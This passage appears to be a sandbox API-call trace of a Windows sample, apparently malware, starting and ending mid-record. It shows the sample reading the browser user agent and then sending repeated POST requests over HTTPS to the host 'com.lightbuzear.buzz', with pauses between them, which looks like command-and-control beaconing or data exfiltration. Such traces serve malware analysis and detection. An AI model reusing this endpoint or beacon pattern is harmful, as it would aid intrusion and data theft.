returned 1 [0278.025] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0278.026] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0279.203] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea28 | out: hHeap=0x4780000) returned 1 [0279.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0279.203] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0279.204] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0279.204] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0279.204] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0279.204] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0279.204] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0279.204] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0279.204] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0279.204] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0279.204] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0279.204] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0b0 [0279.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f218 [0279.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0b0 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0279.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f218 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bea28 [0279.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0279.205] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea28 | out: hHeap=0x4780000) returned 1 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea28 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0279.205] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf130 [0279.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0279.206] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0279.206] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0279.206] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0279.207] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf130 | out: hHeap=0x4780000) returned 1 [0279.207] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1e8 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0279.208] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf090 [0279.208] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0279.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0279.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf090 | out: hHeap=0x4780000) returned 1 [0279.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee60 [0279.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0279.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed20 [0279.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0279.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0279.210] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0279.210] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0279.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed20 | out: hHeap=0x4780000) returned 1 [0279.210] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0279.211] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0279.211] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0279.211] FreeLibrary (hLibModule=0x71570000) returned 1 [0279.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0279.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0279.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0279.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0279.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0279.212] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0279.212] Sleep (dwMilliseconds=0x2710) [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0279.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0279.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0279.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0279.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed98 [0279.227] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0279.227] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edc8 [0279.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0279.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0279.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0279.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ed98 [0279.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0279.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0279.228] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0279.228] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0279.228] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0279.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0279.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0279.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0279.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0279.229] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edc8 [0279.229] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1b8 [0279.230] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edc8 | out: hHeap=0x4780000) returned 1 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0279.230] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be848 [0279.230] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0279.230] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba20 [0279.230] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0279.230] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0279.231] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0279.231] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0279.231] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0279.231] FreeLibrary (hLibModule=0x71780000) returned 1 [0279.232] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0279.232] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0279.232] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0279.232] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0e0 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0279.233] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0e0 | out: hHeap=0x4780000) returned 1 [0279.233] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f158 [0279.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0279.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0279.234] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0279.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0279.234] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0279.234] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beed8 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1b8 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1a0 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0279.235] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f1d0 [0279.235] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf018 [0279.236] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf018 | out: hHeap=0x4780000) returned 1 [0279.236] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0279.236] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0279.236] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0279.236] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f080 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0b0 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f080 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0b0 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bef50 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0279.237] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef50 | out: hHeap=0x4780000) returned 1 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bede8 [0279.237] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0279.238] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0279.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0279.238] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0279.239] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0279.239] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0279.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0279.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0279.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0279.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0279.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0279.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0279.239] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0279.239] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f098 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f218 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f098 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f218 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf040 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0279.240] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf040 | out: hHeap=0x4780000) returned 1 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf0b8 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0279.240] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee38 [0279.241] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0279.241] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0279.241] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0279.241] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0280.381] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee38 | out: hHeap=0x4780000) returned 1 [0280.381] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0280.381] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0280.382] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0280.382] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0280.382] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0280.382] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0280.382] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0280.382] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0280.382] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0280.382] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0280.382] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0280.382] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f170 [0280.383] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f080 [0280.383] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f170 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0280.383] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f080 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed98 [0280.383] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0280.383] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed98 | out: hHeap=0x4780000) returned 1 [0280.383] RtlAllocateHeap 